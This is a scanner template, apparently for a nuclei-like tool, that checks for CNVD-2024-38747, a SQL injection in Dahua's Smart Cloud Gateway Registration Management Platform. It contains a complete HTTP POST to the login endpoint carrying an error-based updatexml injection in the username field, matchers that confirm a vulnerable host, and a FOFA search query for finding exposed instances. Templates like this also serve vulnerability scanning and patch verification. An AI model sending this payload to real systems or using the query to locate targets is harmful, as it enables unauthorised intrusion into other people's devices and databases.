## id: CNVD-2024-38747
## name: Zhejiang Dahua Smart Cloud Gateway Registration Platform - SQL Injection
## author: hack007x
## severity: high
## tags: cnvd,cnvd2024,sqli,dahua,vuln
## description: Zhejiang Dahua Technology Co., Ltd. Smart Cloud Gateway Registration Management Platform has a SQL injection vulnerability, which can be exploited by attackers to obtain sensitive database information.
## reference: https://blog.csdn.net/qq_39894062/article/details/142982815
## fofa-query: title="智能云网关注册管理平台"
## verification: true

#$ num = 999999999
POST /index.php/User/doLogin HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

username=1')and+updatexml(1,concat(0x7e,md5({{num}}),0x7e),1)--+&password=

#@ condition: and
#@ matcher: body contains "md5({{num}})" && body contains "XPATH syntax error"
#@ matcher: status_code == 404





# @VEIL-STAMP: 0c677e80618ba1f22a8259b4780afcd65516dcc81233464f51c1a72d6aae29a1
